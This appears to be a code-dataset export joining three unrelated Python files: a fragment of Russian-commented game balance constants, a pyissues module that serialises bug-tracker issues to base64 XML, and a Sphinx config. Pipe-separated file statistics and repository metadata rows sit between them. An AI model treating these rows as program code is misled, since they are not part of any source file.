CELL_TRANSPORT_MIN: float = CELL_SAFETY_MIN * _SAFETY_TO_TRANSPORT
CELL_TRANSPORT_DELTA: float = CELL_SAFETY_DELTA * _SAFETY_TO_TRANSPORT
CELL_TRANSPORT_MAGIC: float = -CELL_TRANSPORT_DELTA
CELL_TRANSPORT_HAS_MAIN_ROAD: float = 0.5
CELL_TRANSPORT_HAS_OFF_ROAD: float = CELL_TRANSPORT_HAS_MAIN_ROAD / 2
# дорога по клетке без штрафов и модификаторов должна давать 100% скорость
CELL_TRANSPORT_BASE: float = 1.0 - CELL_TRANSPORT_HAS_MAIN_ROAD
PATH_MODIFIER_MINOR_DELTA: float = 0.025
PATH_MODIFIER_NORMAL_DELTA: float = 0.075
PATH_MODIFIER_MINIMUM_MULTIPLIER: float = 0.1
##########################
# Задания
##########################
QUESTS_PILGRIMAGE_FRACTION: float = 0.025 # вероятность отправить героя в паломничество
##########################
# Влияние
##########################
HERO_FAME_PER_HELP: int = 1000 # стандартное количество известности, которое получает герой за помощь городу
HERO_POWER_PER_DAY: int = 100 # базовое количество влияния, которое герой 1-ого уровня производит в день на одного жителя задействованного в заданиях
PERSON_POWER_PER_QUEST_FRACTION: float = 0.33 # разброс влияния за задание
PERSON_POWER_FOR_RANDOM_SPEND: int = 200
MINIMUM_CARD_POWER: int = HERO_POWER_PER_DAY
EXPECTED_HERO_QUEST_POWER_MODIFIER: float = 5
# в 2 раза больше, так как карту надо применять к конкретному квесту, а не сразу к мастеру
# в EXPECTED_HERO_QUEST_POWER_MODIFIER раз меньше, так как на эффект квеста действует политический бонус героя, считаем его в среднем равным EXPECTED_HERO_QUEST_POWER_MODIFIER
CARD_BONUS_FOR_QUEST: int = int(2 * MINIMUM_CARD_POWER / EXPECTED_HERO_QUEST_POWER_MODIFIER)
NORMAL_JOB_LENGTH: int = 4 # минимальная длительность занятия мастера в днях
JOB_MIN_POWER: float = 0.5
JOB_MAX_POWER: float = 2.0
JOB_NEGATIVE_POWER_MULTIPLIER: float = 2.0 # множитель награды для противников: ломать — не строить
##########################
# споособности
##########################
ABILITIES_ACTIVE_MAXIMUM: int = 5
ABILITIES_PASSIVE_MAXIMUM: int = 2
ABILITIES_BATTLE_MAXIMUM: int = ABILITIES_ACTIVE_MAXIMUM + ABILITIES_PASSIVE_MAXIMUM
ABILITIES_NONBATTLE_MAXIMUM: int = 4
ABILITIES_COMPANION_MAXIMUM: int = 4
ABILITIES_OLD_ABILITIES_FOR_CHOOSE_MAXIMUM: int = 2
ABILITIES_FOR_CHOOSE_MAXIMUM: int = 4
##########################
# Черты
##########################
HABITS_NEW_HERO_POINTS: int = 200
HABITS_BORDER: int = 1000 # модуль максимального значения черты
HABITS_RIGHT_BORDERS: List[int] = [-700, -300, -100, 100, 300, 700, 1001] # правые границы черт
HABITS_QUEST_ACTIVE_DELTA: float = 20.0 # за выбор в задании игроком
HABITS_QUEST_PASSIVE_DELTA: float = 0.05 * HABITS_QUEST_ACTIVE_DELTA # за неверный выбор героем
HABITS_HELP_ABILITY_DELTA: float = HABITS_BORDER / (60 * ANGEL_ENERGY_IN_DAY / ANGEL_HELP_COST) # за использование способности
HABITS_ARENA_ABILITY_DELTA: float = HABITS_BORDER / (60 * ANGEL_ENERGY_IN_DAY / ANGEL_ARENA_COST) # за использование способности
HABITS_QUEST_ACTIVE_PREMIUM_MULTIPLIER: float = 1.5 # бонус к начисляемому влиянию за выбор игрока для подписчиков
KILL_BEFORE_BATTLE_PROBABILITY: float = 0.05 # вероятность убить мобы в начале боя
PICKED_UP_IN_ROAD_TELEPORT_LENGTH: float = ANGEL_HELP_TELEPORT_DISTANCE
# бонус к скорости передвижения, эквивалентный вероятности убить моба
PICKED_UP_IN_ROAD_SPEED_BONUS: float = BATTLES_PER_TURN * KILL_BEFORE_BATTLE_PROBABILITY * _SAFETY_TO_TRANSPORT
PICKED_UP_IN_ROAD_PROBABILITY: float = PICKED_UP_IN_ROAD_SPEED_BONUS / PICKED_UP_IN_ROAD_TELEPORT_LENGTH
HABIT_QUEST_PRIORITY_MODIFIER: float = 1.0 # модификатор приоритета выбора заданий от предпочтений
HONOR_POWER_BONUS_FRACTION: float = 1.5 # бонус к влиянию для чести
MONSTER_TYPE_BATTLE_CRIT_MAX_CHANCE: float = 0.02 # вероятность крита по типу монстра, если все монстры этого типа
HABIT_QUEST_REWARD_MAX_BONUS: float = 1.0 # максимальный бонус к награде за задание при выборе, совпадающем с чертой
HABIT_LOOT_PROBABILITY_MODIFIER: float = 1.2 # бонус к вероятности получить любой лут
PEACEFULL_BATTLE_PROBABILITY: float = 0.01 # вероятность мирно разойтись с монстром, если все можно расходиться со всеми типами монстров
# вероятность получить опыт расчитывается исходя из:
# - средней величины получаемого опыта
# - ускорения прокачки от первого удара (вычитается)
# - проигрыша агрессивного использования способностей (молния) перед мирными (телепортом) (плюсуется)
# - лечение не учитываем, т.к. оно может быть применено и в бою и не в бою
# процент сохранённых ходов от первого удара
_FIRST_STRIKE_TURNS_BONUS: float = (0.5 * BATTLES_BEFORE_HEAL) / ACTIONS_CYCLE_LENGTH # выигрываем полхода в каждой битве
_HELPS_IN_TURN = (float(ANGEL_ENERGY_IN_DAY) / ANGEL_HELP_COST) / 24 / TURNS_IN_HOUR
# процент сохранённых ходов сражения, если только бьём молнией
_BATTLE_TURNS_BONUS_FROM_ON_USE: float = (float(BATTLE_LENGTH) * (sum(ANGEL_HELP_LIGHTING_FRACTION) / 2) + HEAL_LENGTH * (sum(ANGEL_HELP_HEAL_FRACTION) / 2)) / 2
_BATTLE_TURNS_BONUS: float = _BATTLE_TURNS_BONUS_FROM_ON_USE * _HELPS_IN_TURN
# процент сохранённых ходов движения, если только телепортируем
_TELEPORT_MOVE_TURNS: float = ANGEL_HELP_TELEPORT_DISTANCE / HERO_MOVE_SPEED
_TELEPORT_SAVED_BATTLES: float = _TELEPORT_MOVE_TURNS / INTERVAL_BETWEEN_BATTLES
_TELEPORT_SAVED_TURNS: float = _TELEPORT_MOVE_TURNS + _TELEPORT_SAVED_BATTLES * BATTLE_LENGTH + HEAL_LENGTH * _TELEPORT_SAVED_BATTLES / BATTLES_BEFORE_HEAL
_TELEPORT_TURNS_BONUS: float = _TELEPORT_SAVED_TURNS * _HELPS_IN_TURN
# процент сохранённых ходов от мирного расхождения с монстрами
_PEACEFULL_TURNS_BONUS: float = (PEACEFULL_BATTLE_PROBABILITY * float(BATTLES_BEFORE_HEAL) * BATTLE_LENGTH) / ACTIONS_CYCLE_LENGTH
# print 'battles in day', TURNS_IN_HOUR * 24 / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL
# print 'inverted', 1.0 / (TURNS_IN_HOUR * 24 / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL)
# print 'strike', _FIRST_STRIKE_TURNS_BONUS
# print 'battle', _BATTLE_TURNS_BONUS
# print 'teleport', _TELEPORT_TURNS_BONUS
EXP_FOR_KILL: int = 2 * EXP_PER_HOUR # средний опыт за убийство монстра
EXP_FOR_KILL_DELTA: float = 0.3 # разброс опыта за убийство
_KILLS_IN_HOUR: float = TURNS_IN_HOUR / ACTIONS_CYCLE_LENGTH * BATTLES_BEFORE_HEAL
_REQUIRED_EXP_BONUS = _TELEPORT_TURNS_BONUS + _PEACEFULL_TURNS_BONUS - _BATTLE_TURNS_BONUS - _FIRST_STRIKE_TURNS_BONUS
# вероятность получить опыт за убийство моба
EXP_FOR_KILL_PROBABILITY: float = EXP_PER_HOUR * _REQUIRED_EXP_BONUS / _KILLS_IN_HOUR / EXP_FOR_KILL
###########################
# события для черт
###########################
HABIT_EVENTS_IN_DAY: float = 1.33 # количество событий в сутки
HABIT_EVENTS_IN_TURN: float = HABIT_EVENTS_IN_DAY / 24 / TURNS_IN_HOUR # вероятность события в ход
HABIT_MOVE_EVENTS_IN_TURN: float = HABIT_EVENTS_IN_TURN / (BATTLES_BEFORE_HEAL * INTERVAL_BETWEEN_BATTLES / float(ACTIONS_CYCLE_LENGTH)) # вероятность события при движении
HABIT_IN_PLACE_EVENTS_IN_TURN: float = HABIT_MOVE_EVENTS_IN_TURN * 10 # вероятность события в городе (с учётом имплементации)
# приоритеты событий с разными эффектами
HABIT_EVENT_NOTHING_PRIORITY: float = 4.0
HABIT_EVENT_MONEY_PRIORITY: float = 4.0
HABIT_EVENT_ARTIFACT_PRIORITY: float = 2.0
HABIT_EVENT_EXPERIENCE_PRIORITY: float = 1.0
# получаемые деньги могут быть эквиваленты цене продажи артефакта
# артефакт может создаваться обычным (как при луте)
# считаем, что можем позволить ускорить прокачку на 5%
_HABIT_EVENT_TOTAL_PRIORITY: float = HABIT_EVENT_NOTHING_PRIORITY + HABIT_EVENT_MONEY_PRIORITY + HABIT_EVENT_ARTIFACT_PRIORITY + HABIT_EVENT_EXPERIENCE_PRIORITY
HABIT_EVENT_EXPERIENCE: int = int(0.05 * (24.0 * EXP_PER_HOUR) / (HABIT_EVENTS_IN_DAY * HABIT_EVENT_EXPERIENCE_PRIORITY / _HABIT_EVENT_TOTAL_PRIORITY))
HABIT_EVENT_EXPERIENCE_DELTA: float = 0.5 # разброс опыта
###########################
# pvp
###########################
DAMAGE_PVP_ADVANTAGE_MODIFIER: float = 0.5 # на какую долю изменяется урон при максимальной разнице в преимуществе между бойцами
DAMAGE_PVP_FULL_ADVANTAGE_STRIKE_MODIFIER: float = 5.0 # во сколько раз увеличится урон удара при максимальном преимушестве
PVP_MAX_ADVANTAGE_STEP: float = 0.25
PVP_ADVANTAGE_BARIER: float = 0.95
PVP_EFFECTIVENESS_EXTINCTION_FRACTION: float = 0.1
PVP_EFFECTIVENESS_STEP: float = 10
PVP_EFFECTIVENESS_INITIAL: float = 300
###########################
# города
###########################
PLACE_MIN_PERSONS: int = 2
PLACE_MAX_PERSONS: List[int] = [0, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]
PLACE_ABSOLUTE_MAX_PERSONS: int = PLACE_MAX_PERSONS[-1]
PLACE_MIN_STABILITY: float = 0.0
PLACE_MIN_CULTURE: float = 0.2
PLACE_MIN_FREEDOM: float = 0.1
PLACE_BASE_STABILITY: float = 1.0
PLACE_MAX_SIZE: int = 10
PLACE_MAX_ECONOMIC: int = 10
PLACE_MAX_FRONTIER_ECONOMIC: int = 5
PLACE_NEW_PLACE_LIVETIME: int = 2 * 7 * 24 * 60 * 60
PLACE_POWER_HISTORY_WEEKS: int = 6 # количество недель, которое хранится влияние города
PLACE_POWER_HISTORY_LENGTH: int = int(PLACE_POWER_HISTORY_WEEKS * 7 * 24 * TURNS_IN_HOUR) # в ходах
PLACE_POWER_RECALCULATE_STEPS: float = PLACE_POWER_HISTORY_LENGTH / MAP_SYNC_TIME
PLACE_POWER_REDUCE_FRACTION: float = math.pow(0.01, 1.0 / PLACE_POWER_RECALCULATE_STEPS)
PLACE_FAME_REDUCE_FRACTION: float = PLACE_POWER_REDUCE_FRACTION
PLACE_MONEY_REDUCE_FRACTION: float = PLACE_POWER_REDUCE_FRACTION
PLACE_TYPE_NECESSARY_BORDER: int = 75
PLACE_TYPE_ENOUGH_BORDER: int = 50
PLACE_GOODS_BONUS: int = 100 # в час, соответственно PLACE_GOODS_BONUS * LEVEL — прирост/убыль товаров в городе
PLACE_GOODS_TO_LEVEL: int = int(PLACE_GOODS_BONUS * (1 + 3.0 / 2) * 24) # 1 город + 3 средних жителя за 24 часа
PLACE_GOODS_AFTER_LEVEL_UP: float = 0.25 # процент товаров, остающихся при увеличении размера города
PLACE_GOODS_AFTER_LEVEL_DOWN: float = 0.75 # процент товаров, возвращающихся при уменьшении размера города
PLACE_GOODS_FROM_BEST_PERSON: int = PLACE_GOODS_BONUS // 2
PLACE_GOODS_FOR_BUILDING_SUPPORT: int = PLACE_GOODS_FROM_BEST_PERSON * 3 // 5
# поскольку наибольшая статья расходов на стабилизацию ландшафта — дороги, то расчёт делаем исходя из них
# здания и города будут вкладывать значительно меньше в эту статью трат (потому что меньше клеток занимают)
#
# во ремя введения стабилизации магии средний город имел дорог ~ 26 клеток, т.е. по 13, если делить поровну между двумя точками
# округлим до 15
PLACE_AVERAGE_TOTAL_ROADS_PRICE: int = int(1.5 * PLACE_GOODS_BONUS) # средняя стоимость поддержки дорог для города
CELL_STABILIZATION_PRICE: int = PLACE_AVERAGE_TOTAL_ROADS_PRICE // 15
# если размер города равен 1 (минимальный) и производство отрицательное
# то в городе вводят пошлину в размере "недостающее производство" * PLACE_TAX_PER_ONE_GOODS
PLACE_TAX_PER_ONE_GOODS: float = 0.1 / PLACE_GOODS_BONUS
# максимальное производство от пошлины фиксируется статически, а не динамически (например как 1/PLACE_TAX_PER_ONE_GOODS)
# поскольку последнее:
# - либо сделает пошлину крайне невыгодной в книге судеб
# - либо позволит поддерживать город максимального размера при, ожидаемом минимальном размере
MAX_PRODUCTION_FROM_TAX: int = int(PLACE_GOODS_BONUS * 2.5)
# исходим из того, что в первую очередь надо балансировать вероятность нападения монстров как самый важный параметр
PLACE_SAFETY_FROM_BEST_PERSON: float = 0.025
PLACE_TRANSPORT_FROM_BEST_PERSON: float = PLACE_SAFETY_FROM_BEST_PERSON * _SAFETY_TO_TRANSPORT
# хотя на опыт свобода и не влияет, но на город оказывает такое-же влияние как и транспорт
PLACE_FREEDOM_FROM_BEST_PERSON: float = PLACE_TRANSPORT_FROM_BEST_PERSON
PLACE_CULTURE_FROM_BEST_PERSON: float = 0.15
PLACE_RACE_CHANGE_DELTA_IN_DAY: float = 0.1
PLACE_RACE_CHANGE_DELTA: float = (PLACE_RACE_CHANGE_DELTA_IN_DAY * MAP_SYNC_TIME) / (24 * TURNS_IN_HOUR)
PLACE_STABILITY_UNIT: float = 0.1 # базовая единица изменения стабильности
PLACE_STABILITY_MAX_PRODUCTION_PENALTY: float = -PLACE_GOODS_BONUS * 2
PLACE_STABILITY_MAX_SAFETY_PENALTY: float = -0.15
PLACE_STABILITY_MAX_TRANSPORT_PENALTY: float = PLACE_STABILITY_MAX_SAFETY_PENALTY * _SAFETY_TO_TRANSPORT
PLACE_STABILITY_MAX_FREEDOM_PENALTY: float = -PLACE_STABILITY_MAX_TRANSPORT_PENALTY
PLACE_STABILITY_MAX_CULTURE_PENALTY: float = -1.0
PLACE_STABILITY_PENALTY_FOR_MASTER: float = -0.15
PLACE_STABILITY_PENALTY_FOR_RACES: float = -0.5 # штраф к стабильности за 100% разницы в давлении рас
PLACE_STABILITY_PENALTY_FOR_SPECIALIZATION: float = -0.5 # штраф за полное несоответствие специализации (когда 0 очков)
# считаем на сколько условных единиц бонусов от Мастеров влияет нулевая стабильность
_STABILITY_PERSONS_POINTS: float = (abs(PLACE_STABILITY_MAX_PRODUCTION_PENALTY) / PLACE_GOODS_FROM_BEST_PERSON +
abs(PLACE_STABILITY_MAX_SAFETY_PENALTY) / PLACE_SAFETY_FROM_BEST_PERSON +
abs(PLACE_STABILITY_MAX_TRANSPORT_PENALTY) / PLACE_TRANSPORT_FROM_BEST_PERSON +
-abs(PLACE_STABILITY_MAX_FREEDOM_PENALTY) / PLACE_FREEDOM_FROM_BEST_PERSON + # на свободу отсутствие стабильности влияет положительно
abs(PLACE_STABILITY_MAX_CULTURE_PENALTY) / PLACE_CULTURE_FROM_BEST_PERSON)
# считаем максимальную стабильность от Мастера
PLACE_STABILITY_FROM_BEST_PERSON: float = 1.0 / _STABILITY_PERSONS_POINTS
WHILD_TRANSPORT_PENALTY: float = 0.1 # штраф к скорости в диких землях и на фронтире
TRANSPORT_FROM_PLACE_SIZE_PENALTY: float = 0.05 # штраф к скорости от размера города
PLACE_HABITS_CHANGE_SPEED_MAXIMUM: float = 10
PLACE_HABITS_CHANGE_SPEED_MAXIMUM_PENALTY: float = 10
PLACE_HABITS_EVENT_PROBABILITY: float = 0.025
JOB_PRODUCTION_BONUS: int = PLACE_GOODS_BONUS
JOB_SAFETY_BONUS: float = PLACE_SAFETY_FROM_BEST_PERSON
JOB_TRANSPORT_BONUS: float = PLACE_TRANSPORT_FROM_BEST_PERSON
JOB_FREEDOM_BONUS: float = PLACE_FREEDOM_FROM_BEST_PERSON
JOB_STABILITY_BONUS: float = PLACE_STABILITY_UNIT
JOB_CULTURE_BONUS: float = PLACE_CULTURE_FROM_BEST_PERSON
RESOURCE_EXCHANGE_COST_PER_CELL: int = int(math.floor(PLACE_GOODS_BONUS / 40))
# время жизни взято «на глаз», чтобы:
# - с одной стороны, обеспечить значимость эффекта для города
# - с другой, предотвратить скопление одинаковых эффектов (от проектов Мастеров, например)
PLACE_STANDARD_EFFECT_LENGTH: int = 15 # в днях
PLACE_STABILITY_RECOVER_SPEED: float = PLACE_STABILITY_UNIT / (PLACE_STANDARD_EFFECT_LENGTH * 24) # стабильности в час
###########################
# мастера
###########################
PERSON_MOVE_DELAY_IN_WEEKS: int = 2
PERSON_MOVE_DELAY: int = int(TURNS_IN_HOUR * 24 * 7 * PERSON_MOVE_DELAY_IN_WEEKS) # минимальная задержка между переездами Мастера
PERSON_SOCIAL_CONNECTIONS_LIMIT: int = 3
PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME_IN_WEEKS: int = 2
PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME: int = int(TURNS_IN_HOUR * 24 * 7 * PERSON_SOCIAL_CONNECTIONS_MIN_LIVE_TIME_IN_WEEKS)
PERSON_SOCIAL_CONNECTIONS_POWER_BONUS: float = 0.1
###########################
# здания
###########################
BUILDING_POSITION_RADIUS: int = 2
BUILDING_PERSON_POWER_BONUS: float = 0.5
BUILDING_TERRAIN_POWER_MULTIPLIER: float = 0.5 # building terrain power is percent from city power
###########################
# Спутники
###########################
# под средним спутником понимается спутник со
# - средним здоровьем
# - средней самоотверженностью
# - средней слаженностью
# рост слаженности огранизуется так, чтобы она росла сначала быстро, потом ооооооочень долго
# в качестве опыта идёт 1 выполненного задания
# для получения слаженности N требуется N опыта
COMPANIONS_MIN_COHERENCE: int = 0 # минимальный уровень слаженности
COMPANIONS_MAX_COHERENCE: int = 100 # максимальный уровень слаженности
# опыта к слаженности за выполненный квест
# подбирается так, чтобы слаженность росла до максимума примерно за 9 месяцев
EXPECTED_FULL_COHERENCE_TIME = 9 * 30 * 24 * 60 * 60
COMPANIONS_MEDIUM_COHERENCE: float = (COMPANIONS_MIN_COHERENCE + COMPANIONS_MAX_COHERENCE) / 2
COMPANIONS_MIN_HEALTH: int = 300 # минимальное максимальное здоровье спутника
COMPANIONS_MAX_HEALTH: int = 700 # максимальное максимальное здоровье спутника
COMPANIONS_MEDIUM_HEALTH: float = (COMPANIONS_MIN_HEALTH + COMPANIONS_MAX_HEALTH) / 2
_COMPANIONS_MEDIUM_LIFETYME: int = 9 # ожидаемое время жизни среднего спутника со средним здоровьем без лечения в днях
# дельты мультипликатора вероятности блока для
COMPANIONS_BLOCK_MULTIPLIER_COHERENCE_DELTA: float = 0.2 # слаженность (от среднего)
COMPANIONS_BLOCK_MULTIPLIER_COMPANION_DEDICATION_DELTA: float = 0.2 # самоотверженности спутника
COMPANIONS_BLOCK_MULTIPLIER_HERO_DEDICATION_DELTA: float = 0.2 # самоотверженность героя
COMPANIONS_HABITS_DELTA: float = 0.5 # дельта изменения черт от среднего в зависимости от предпочтения
COMPANIONS_DEFEND_PROBABILITY: float = COMPANIONS_DEFENDS_IN_BATTLE / (BATTLE_LENGTH / 2)
COMPANIONS_HEALS_IN_HOUR: float = 1.0 # частота действия уход за спутником в час
COMPANIONS_HEALTH_PER_HEAL: int = 2 # лечение спутника за одно действие ухода за спутником
COMPANIONS_DAMAGE_PER_WOUND: int = 10 # урон спутнику за ранение
# частота ранений героя
COMPANIONS_WOUNDS_IN_HOUR_FROM_HEAL: float = COMPANIONS_HEALS_IN_HOUR * COMPANIONS_HEALTH_PER_HEAL / COMPANIONS_DAMAGE_PER_WOUND
COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS: float = COMPANIONS_MEDIUM_HEALTH / COMPANIONS_DAMAGE_PER_WOUND / (_COMPANIONS_MEDIUM_LIFETYME * 24)
COMPANIONS_WOUNDS_IN_HOUR: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS + COMPANIONS_WOUNDS_IN_HOUR_FROM_HEAL
COMPANIONS_WOUND_ON_DEFEND_PROBABILITY_FROM_WOUNDS: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS / (BATTLES_PER_HOUR * COMPANIONS_DEFENDS_IN_BATTLE)
# величины лечения здоровья спутника за одну помощь
COMPANIONS_HEAL_AMOUNT: int = 20
COMPANIONS_HEAL_CRIT_AMOUNT: int = COMPANIONS_HEAL_AMOUNT * 2
# вероятность того, что спутник использует способность во время боя
# на столько же должны увеличивать инициативу особенности спутника с боевыми способностями
COMPANIONS_BATTLE_STRIKE_PROBABILITY: float = 0.05
COMPANIONS_EXP_PER_MOVE_GET_EXP: int = 1 # получаемый героем опыт за одно «действие получения опыта во время движения героя»
# количество получений опыта от спутника в час
COMPANIONS_GET_EXP_MOVE_EVENTS_PER_HOUR: float = EXP_PER_HOUR * COMPANIONS_BONUS_EXP_FRACTION / COMPANIONS_EXP_PER_MOVE_GET_EXP
COMPANIONS_EXP_PER_MOVE_PROBABILITY = COMPANIONS_GET_EXP_MOVE_EVENTS_PER_HOUR / MOVE_TURNS_IN_HOUR
# количество опыта за каждое лечение спутника (при наличии нужной способности)
COMPANIONS_EXP_PER_HEAL: int = int(EXP_PER_HOUR * COMPANIONS_BONUS_EXP_FRACTION / COMPANIONS_HEALS_IN_HOUR)
COMPANIONS_HEAL_BONUS: float = 0.25 # доля отлечиваемого способностями спутников или героя
# количество вылеченного здоровья в час для спутников с лечебной способностью (рассчитывается исходя только из ранений, не компенсирующих лечение действием ухода)
COMPANIONS_REGEN_PER_HOUR: float = COMPANIONS_WOUNDS_IN_HOUR_FROM_WOUNDS * COMPANIONS_DAMAGE_PER_WOUND * COMPANIONS_HEAL_BONUS
COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT: int = 1
COMPANIONS_REGEN_ON_HEAL_AMOUNT: int = 1
COMPANIONS_REGEN_BY_HERO: int = 1
COMPANIONS_REGEN_BY_MONEY_SPEND: int = 1
COMPANIONS_EATEN_CORPSES_PER_BATTLE: float = COMPANIONS_REGEN_PER_HOUR / BATTLES_PER_HOUR / COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT
COMPANIONS_REGEN_ON_HEAL_PER_HEAL: float = COMPANIONS_REGEN_PER_HOUR / COMPANIONS_HEALS_IN_HOUR / COMPANIONS_REGEN_ON_HEAL_AMOUNT
COMPANIONS_HERO_REGEN_ON_HEAL_PER_HEAL: float = COMPANIONS_REGEN_PER_HOUR / COMPANIONS_HEALS_IN_HOUR / COMPANIONS_REGEN_BY_HERO
COMPANIONS_GIVE_COMPANION_AFTER: int = 24 # выдавать спутника герою без спутника примерно раз в N часов
COMPANIONS_LEAVE_IN_PLACE: float = 1.0 / 20 # вероятность того, что нелюдимый спутник покинет героя в городе
COMPANIONS_BONUS_DAMAGE_PROBABILITY: float = 0.25 # вероятность спутника получить дополнительный урон
##############################
# Bills
##############################
PLACE_MAX_BILLS_NUMBER: int = 3
FREE_ACCOUNT_MAX_ACTIVE_BILLS: int = 1
PREMIUM_ACCOUNT_MAX_ACTIVE_BILLS: int = 4
BILLS_FAME_BORDER: int = HERO_FAME_PER_HELP
| 50.33037 | 215 | 0.791099 | 4,856 | 33,973 | 5.216227 | 0.233526 | 0.020134 | 0.004974 | 0.004422 | 0.2167 | 0.115871 | 0.072167 | 0.054955 | 0.038847 | 0.027556 | 0 | 0.022774 | 0.131457 | 33,973 | 674 | 216 | 50.405045 | 0.835158 | 0.430518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001484 | 0 | 1 | 0.003279 | false | 0.009836 | 0.006557 | 0.003279 | 0.013115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876c05276d4206f01cd3257543b6922a7f4d4074 | 5,485 | py | Python | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | pyissues/base.py | HuangFuSL/python-issues | d7c360e89503add9f56676326d628b80c7a84923 | [
"MIT"
] | null | null | null | """Base module of pyissues package
This module provides data model for issues and comments from the Python Issue
Tracker (https://bugs.python.org) with methods to save the issue in
base64-encoded XML format.
"""
from __future__ import annotations
import base64
import warnings
from typing import List
import lxml.etree
from . import const
class UnreadableXMLWarning(Exception):
"""Warning to be raised when fields are written into XML without base64
encoded. Illegal characters such as b"\x01" will make the XML file generated
unreadable.
"""
def __init__(self, *args: object) -> None:
super().__init__(*args)
def __str__(self) -> str:
return super().__str__()
class Comment():
def __init__(self, url: str, author: str, content: str, date: str, username: str):
self.url = url
self.author = author
self.content = content
self.username = username
self.date = date
@staticmethod
def get_fields() -> List[str]:
"""The following attributes are saved as attributes instead of text
nodes in the XML document.
"""
return ['url', 'author', 'date', 'username']
def __repr__(self) -> str:
return "<%s by %s>" % (self.url, self.author)
def __str__(self) -> str:
return self.content
def __hash__(self) -> int:
return hash(self.url)
def __eq__(self, o) -> bool:
return self.url == o.url
class Issue():
def __init__(self, **kwargs):
for key in const._ISSUE_FIELD:
setattr(self, key, "" if key in const._ISSUE_ATTRIBUTES else [])
for key in kwargs:
setattr(self, key, kwargs[key])
self._id = str(self._id)
def __repr__(self) -> str:
return "<Issue at %s>" % (self._id)
def __str__(self) -> str:
return str(self.messages[0])
def __hash__(self) -> int:
return hash(self._id)
def __eq__(self, o) -> bool:
return self._id == o._id
@staticmethod
def _encode(o: str) -> str:
return base64.standard_b64encode(o.encode(encoding='utf-8')).decode()
@staticmethod
def _decode(o: str) -> str:
return base64.standard_b64decode(o).decode(encoding="utf-8")
def dump(self, encode: bool = True) -> lxml.etree.Element:
if encode:
encoder = self._encode
else:
encoder = str
warnings.warn(UnreadableXMLWarning(
"You are saving the non-base64-encoded data , the XML " +
"document generated might be unreadable due to illegal " +
"characters in the document."
))
ret_node = lxml.etree.Element("issue")
for attr in const._ISSUE_ATTRIBUTES:
ret_node.set(attr, encoder(str(getattr(self, attr, ''))))
for attr in const._ISSUE_MULTIPLE_ATTRIBUTES:
for record in getattr(self, attr, None):
new_node = lxml.etree.Element(attr)
new_node.text = record
ret_node.append(new_node)
for attr in const._ISSUE_NODES:
new_node = lxml.etree.Element(attr)
for record in getattr(self, attr, None):
new_sub_node = lxml.etree.Element(attr[:-1])
for field in record:
new_sub_node.set(field, encoder(record[field]))
new_node.append(new_sub_node)
ret_node.append(new_node)
for attr in const._ISSUE_COMPLEX:
new_node = lxml.etree.Element(attr)
for record in getattr(self, attr, None):
new_sub_node = lxml.etree.Element(attr[:-1])
for field in record.get_fields():
new_sub_node.set(field, getattr(record, field))
new_sub_node.text = encoder(str(record))
new_node.append(new_sub_node)
ret_node.append(new_node)
return ret_node
def _load(self, root: lxml.etree._element, decode: bool = True):
decoder = self._decode if decode else str
attributes = root.attrib
for attr in attributes:
setattr(self, attr, decoder(attributes[attr]))
data = {}
for attr in const._ISSUE_MULTIPLE_ATTRIBUTES:
data[attr] = []
for attr in const._ISSUE_NODES:
data[attr] = []
for attr in const._ISSUE_COMPLEX:
data[attr] = []
for child in root:
if child.tag in const._ISSUE_MULTIPLE_ATTRIBUTES:
data[child.tag].append(child.text)
elif child.tag in const._ISSUE_NODES:
for subchild in child:
data[child.tag].append({
_: decoder(subchild.attrib[_]) for _ in subchild.attrib
})
elif child.tag in const._ISSUE_COMPLEX:
for subchild in child:
ret = {
_: subchild.attrib[_] for _ in dict(subchild.attrib)
}
try:
ret['content'] = decoder(subchild.text)
except:
ret['content'] = ""
data[child.tag].append(Comment(**ret))
for _ in data:
setattr(self, _, data[_])
return self
@staticmethod
def load(root: lxml.etree._element, decode: bool = True) -> Issue:
ret = Issue()
return ret._load(root, decode)
| 32.455621 | 86 | 0.572288 | 654 | 5,485 | 4.58104 | 0.221713 | 0.028037 | 0.048064 | 0.03271 | 0.344793 | 0.291389 | 0.228638 | 0.128505 | 0.11749 | 0.11749 | 0 | 0.006223 | 0.326162 | 5,485 | 168 | 87 | 32.64881 | 0.804383 | 0.082407 | 0 | 0.300813 | 0 | 0 | 0.041541 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.146341 | false | 0 | 0.04878 | 0.089431 | 0.341463 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876eb547b3459facec759055ce7fa56b3f74684a | 428 | py | Python | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
from usps_client.version import VERSION as version
release = version
project = "usps-client"
copyright = "2019, macro1"
author = "macro1"
